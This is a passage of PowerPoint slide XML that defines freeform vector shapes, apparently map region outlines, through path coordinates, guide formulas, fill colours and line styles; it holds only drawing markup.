                      <a:pt x="44" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36159" name="Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2572" y="1889"/>
                <a:ext cx="71" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 71"/>
                  <a:gd name="T1" fmla="*/ 36 h 102"/>
                  <a:gd name="T2" fmla="*/ 67 w 71"/>
                  <a:gd name="T3" fmla="*/ 40 h 102"/>
                  <a:gd name="T4" fmla="*/ 71 w 71"/>
                  <a:gd name="T5" fmla="*/ 64 h 102"/>
                  <a:gd name="T6" fmla="*/ 68 w 71"/>
                  <a:gd name="T7" fmla="*/ 71 h 102"/>
                  <a:gd name="T8" fmla="*/ 65 w 71"/>
                  <a:gd name="T9" fmla="*/ 82 h 102"/>
                  <a:gd name="T10" fmla="*/ 62 w 71"/>
                  <a:gd name="T11" fmla="*/ 81 h 102"/>
                  <a:gd name="T12" fmla="*/ 57 w 71"/>
                  <a:gd name="T13" fmla="*/ 84 h 102"/>
                  <a:gd name="T14" fmla="*/ 44 w 71"/>
                  <a:gd name="T15" fmla="*/ 86 h 102"/>
                  <a:gd name="T16" fmla="*/ 38 w 71"/>
                  <a:gd name="T17" fmla="*/ 91 h 102"/>
                  <a:gd name="T18" fmla="*/ 27 w 71"/>
                  <a:gd name="T19" fmla="*/ 97 h 102"/>
                  <a:gd name="T20" fmla="*/ 11 w 71"/>
                  <a:gd name="T21" fmla="*/ 102 h 102"/>
                  <a:gd name="T22" fmla="*/ 11 w 71"/>
                  <a:gd name="T23" fmla="*/ 92 h 102"/>
                  <a:gd name="T24" fmla="*/ 4 w 71"/>
                  <a:gd name="T25" fmla="*/ 88 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 71"/>
                  <a:gd name="T27" fmla="*/ 84 h 102"/>
                  <a:gd name="T28" fmla="*/ 10 w 71"/>
                  <a:gd name="T29" fmla="*/ 82 h 102"/>
                  <a:gd name="T30" fmla="*/ 12 w 71"/>
                  <a:gd name="T31" fmla="*/ 78 h 102"/>
                  <a:gd name="T32" fmla="*/ 16 w 71"/>
                  <a:gd name="T33" fmla="*/ 73 h 102"/>
                  <a:gd name="T34" fmla="*/ 22 w 71"/>
                  <a:gd name="T35" fmla="*/ 69 h 102"/>
                  <a:gd name="T36" fmla="*/ 17 w 71"/>
                  <a:gd name="T37" fmla="*/ 65 h 102"/>
                  <a:gd name="T38" fmla="*/ 19 w 71"/>
                  <a:gd name="T39" fmla="*/ 58 h 102"/>
                  <a:gd name="T40" fmla="*/ 26 w 71"/>
                  <a:gd name="T41" fmla="*/ 57 h 102"/>
                  <a:gd name="T42" fmla="*/ 22 w 71"/>
                  <a:gd name="T43" fmla="*/ 55 h 102"/>
                  <a:gd name="T44" fmla="*/ 17 w 71"/>
                  <a:gd name="T45" fmla="*/ 54 h 102"/>
                  <a:gd name="T46" fmla="*/ 12 w 71"/>
                  <a:gd name="T47" fmla="*/ 52 h 102"/>
                  <a:gd name="T48" fmla="*/ 6 w 71"/>
                  <a:gd name="T49" fmla="*/ 51 h 102"/>
                  <a:gd name="T50" fmla="*/ 6 w 71"/>
                  <a:gd name="T51" fmla="*/ 46 h 102"/>
                  <a:gd name="T52" fmla="*/ 11 w 71"/>
                  <a:gd name="T53" fmla="*/ 41 h 102"/>
                  <a:gd name="T54" fmla="*/ 10 w 71"/>
                  <a:gd name="T55" fmla="*/ 35 h 102"/>
                  <a:gd name="T56" fmla="*/ 6 w 71"/>
                  <a:gd name="T57" fmla="*/ 31 h 102"/>
                  <a:gd name="T58" fmla="*/ 10 w 71"/>
                  <a:gd name="T59" fmla="*/ 26 h 102"/>
                  <a:gd name="T60" fmla="*/ 19 w 71"/>
                  <a:gd name="T61" fmla="*/ 27 h 102"/>
                  <a:gd name="T62" fmla="*/ 31 w 71"/>
                  <a:gd name="T63" fmla="*/ 29 h 102"/>
                  <a:gd name="T64" fmla="*/ 35 w 71"/>
                  <a:gd name="T65" fmla="*/ 21 h 102"/>
                  <a:gd name="T66" fmla="*/ 27 w 71"/>
                  <a:gd name="T67" fmla="*/ 17 h 102"/>
                  <a:gd name="T68" fmla="*/ 32 w 71"/>
                  <a:gd name="T69" fmla="*/ 14 h 102"/>
                  <a:gd name="T70" fmla="*/ 35 w 71"/>
                  <a:gd name="T71" fmla="*/ 4 h 102"/>
                  <a:gd name="T72" fmla="*/ 44 w 71"/>
                  <a:gd name="T73" fmla="*/ 0 h 102"/>
                  <a:gd name="T74" fmla="*/ 48 w 71"/>
                  <a:gd name="T75" fmla="*/ 6 h 102"/>
                  <a:gd name="T76" fmla="*/ 49 w 71"/>
                  <a:gd name="T77" fmla="*/ 8 h 102"/>
                  <a:gd name="T78" fmla="*/ 41 w 71"/>
                  <a:gd name="T79" fmla="*/ 16 h 102"/>
                  <a:gd name="T80" fmla="*/ 38 w 71"/>
                  <a:gd name="T81" fmla="*/ 22 h 102"/>
                  <a:gd name="T82" fmla="*/ 42 w 71"/>
                  <a:gd name="T83" fmla="*/ 29 h 102"/>
                  <a:gd name="T84" fmla="*/ 53 w 71"/>
                  <a:gd name="T85" fmla="*/ 28 h 102"/>
                  <a:gd name="T86" fmla="*/ 57 w 71"/>
                  <a:gd name="T87" fmla="*/ 25 h 102"/>
                  <a:gd name="T88" fmla="*/ 61 w 71"/>
                  <a:gd name="T89" fmla="*/ 30 h 102"/>
                  <a:gd name="T90" fmla="*/ 67 w 71"/>
                  <a:gd name="T91" fmla="*/ 32 h 102"/>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71"/>
                  <a:gd name="T139" fmla="*/ 0 h 102"/>
                  <a:gd name="T140" fmla="*/ 71 w 71"/>
                  <a:gd name="T141" fmla="*/ 102 h 102"/>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71" h="102">
                    <a:moveTo>
                      <a:pt x="69" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36160" name="Freeform 293"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1485" y="2745"/>
                <a:ext cx="188" cy="265"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 114 w 188"/>
                  <a:gd name="T1" fmla="*/ 10 h 265"/>
                  <a:gd name="T2" fmla="*/ 110 w 188"/>
                  <a:gd name="T3" fmla="*/ 20 h 265"/>
                  <a:gd name="T4" fmla="*/ 97 w 188"/>
                  <a:gd name="T5" fmla="*/ 38 h 265"/>
                  <a:gd name="T6" fmla="*/ 95 w 188"/>
                  <a:gd name="T7" fmla="*/ 52 h 265"/>
                  <a:gd name="T8" fmla="*/ 107 w 188"/>
                  <a:gd name="T9" fmla="*/ 69 h 265"/>
                  <a:gd name="T10" fmla="*/ 112 w 188"/>
                  <a:gd name="T11" fmla="*/ 86 h 265"/>
                  <a:gd name="T12" fmla="*/ 135 w 188"/>
                  <a:gd name="T13" fmla="*/ 87 h 265"/>
                  <a:gd name="T14" fmla="*/ 150 w 188"/>
                  <a:gd name="T15" fmla="*/ 99 h 265"/>
                  <a:gd name="T16" fmla="*/ 165 w 188"/>
                  <a:gd name="T17" fmla="*/ 101 h 265"/>
                  <a:gd name="T18" fmla="*/ 180 w 188"/>
                  <a:gd name="T19" fmla="*/ 111 h 265"/>
                  <a:gd name="T20" fmla="*/ 177 w 188"/>
                  <a:gd name="T21" fmla="*/ 122 h 265"/>
                  <a:gd name="T22" fmla="*/ 183 w 188"/>
                  <a:gd name="T23" fmla="*/ 139 h 265"/>
                  <a:gd name="T24" fmla="*/ 179 w 188"/>
                  <a:gd name="T25" fmla="*/ 154 h 265"/>
                  <a:gd name="T26" fmla="*/ 178 w 188"/>
                  <a:gd name="T27" fmla="*/ 172 h 265"/>
                  <a:gd name="T28" fmla="*/ 148 w 188"/>
                  <a:gd name="T29" fmla="*/ 172 h 265"/>
                  <a:gd name="T30" fmla="*/ 155 w 188"/>
                  <a:gd name="T31" fmla="*/ 184 h 265"/>
                  <a:gd name="T32" fmla="*/ 156 w 188"/>
                  <a:gd name="T33" fmla="*/ 190 h 265"/>
                  <a:gd name="T34" fmla="*/ 144 w 188"/>
                  <a:gd name="T35" fmla="*/ 191 h 265"/>
                  <a:gd name="T36" fmla="*/ 150 w 188"/>
                  <a:gd name="T37" fmla="*/ 207 h 265"/>
                  <a:gd name="T38" fmla="*/ 154 w 188"/>
                  <a:gd name="T39" fmla="*/ 219 h 265"/>
                  <a:gd name="T40" fmla="*/ 145 w 188"/>
                  <a:gd name="T41" fmla="*/ 265 h 265"/>
                  <a:gd name="T42" fmla="*/ 137 w 188"/>
                  <a:gd name="T43" fmla="*/ 258 h 265"/>
                  <a:gd name="T44" fmla="*/ 142 w 188"/>
                  <a:gd name="T45" fmla="*/ 243 h 265"/>
                  <a:gd name="T46" fmla="*/ 121 w 188"/>
                  <a:gd name="T47" fmla="*/ 237 h 265"/>
                  <a:gd name="T48" fmla="*/ 108 w 188"/>
                  <a:gd name="T49" fmla="*/ 239 h 265"/>
                  <a:gd name="T50" fmla="*/ 96 w 188"/>
                  <a:gd name="T51" fmla="*/ 233 h 265"/>
                  <a:gd name="T52" fmla="*/ 88 w 188"/>
                  <a:gd name="T53" fmla="*/ 227 h 265"/>
                  <a:gd name="T54" fmla="*/ 74 w 188"/>
                  <a:gd name="T55" fmla="*/ 210 h 265"/>
                  <a:gd name="T56" fmla="*/ 56 w 188"/>
                  <a:gd name="T57" fmla="*/ 201 h 265"/>
                  <a:gd name="T58" fmla="*/ 47 w 188"/>
                  <a:gd name="T59" fmla="*/ 194 h 265"/>
                  <a:gd name="T60" fmla="*/ 28 w 188"/>
                  <a:gd name="T61" fmla="*/ 194 h 265"/>
                  <a:gd name="T62" fmla="*/ 12 w 188"/>
                  <a:gd name="T63" fmla="*/ 182 h 265"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 172 h 265"/>
                  <a:gd name="T66" fmla="*/ 9 w 188"/>
                  <a:gd name="T67" fmla="*/ 168 h 265"/>
                  <a:gd name="T68" fmla="*/ 15 w 188"/>
                  <a:gd name="T69" fmla="*/ 159 h 265"/>
                  <a:gd name="T70" fmla="*/ 26 w 188"/>
                  <a:gd name="T71" fmla="*/ 146 h 265"/>
                  <a:gd name="T72" fmla="*/ 25 w 188"/>
                  <a:gd name="T73" fmla="*/ 132 h 265"/>
                  <a:gd name="T74" fmla="*/ 24 w 188"/>
                  <a:gd name="T75" fmla="*/ 111 h 265"/>
                  <a:gd name="T76" fmla="*/ 29 w 188"/>
                  <a:gd name="T77" fmla="*/ 105 h 265"/>
                  <a:gd name="T78" fmla="*/ 27 w 188"/>
                  <a:gd name="T79" fmla="*/ 97 h 265"/>
                  <a:gd name="T80" fmla="*/ 18 w 188"/>
                  <a:gd name="T81" fmla="*/ 85 h 265"/>
                  <a:gd name="T82" fmla="*/ 22 w 188"/>
                  <a:gd name="T83" fmla="*/ 76 h 265"/>
                  <a:gd name="T84" fmla="*/ 30 w 188"/>
                  <a:gd name="T85" fmla="*/ 72 h 265"/>
                  <a:gd name="T86" fmla="*/ 25 w 188"/>
                  <a:gd name="T87" fmla="*/ 61 h 265"/>
                  <a:gd name="T88" fmla="*/ 34 w 188"/>
                  <a:gd name="T89" fmla="*/ 73 h 265"/>
                  <a:gd name="T90" fmla="*/ 35 w 188"/>
                  <a:gd name="T91" fmla="*/ 63 h 265"/>
                  <a:gd name="T92" fmla="*/ 46 w 188"/>
                  <a:gd name="T93" fmla="*/ 50 h 265"/>
                  <a:gd name="T94" fmla="*/ 54 w 188"/>
                  <a:gd name="T95" fmla="*/ 43 h 265"/>
                  <a:gd name="T96" fmla="*/ 60 w 188"/>
                  <a:gd name="T97" fmla="*/ 26 h 265"/>
                  <a:gd name="T98" fmla="*/ 71 w 188"/>
                  <a:gd name="T99" fmla="*/ 24 h 265"/>
                  <a:gd name="T100" fmla="*/ 76 w 188"/>
                  <a:gd name="T101" fmla="*/ 17 h 265"/>
                  <a:gd name="T102" fmla="*/ 90 w 188"/>
                  <a:gd name="T103" fmla="*/ 18 h 265"/>
                  <a:gd name="T104" fmla="*/ 106 w 188"/>
                  <a:gd name="T105" fmla="*/ 10 h 265"/>
                  <a:gd name="T106" fmla="*/ 117 w 188"/>
                  <a:gd name="T107" fmla="*/ 0 h 265"/>
                  <a:gd name="T108" fmla="*/ 127 w 188"/>
                  <a:gd name="T109" fmla="*/ 6 h 265"/>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88"/>
                  <a:gd name="T166" fmla="*/ 0 h 265"/>
                  <a:gd name="T167" fmla="*/ 188 w 188"/>
                  <a:gd name="T168" fmla="*/ 265 h 265"/>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88" h="265">
                    <a:moveTo>
                      <a:pt x="125" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
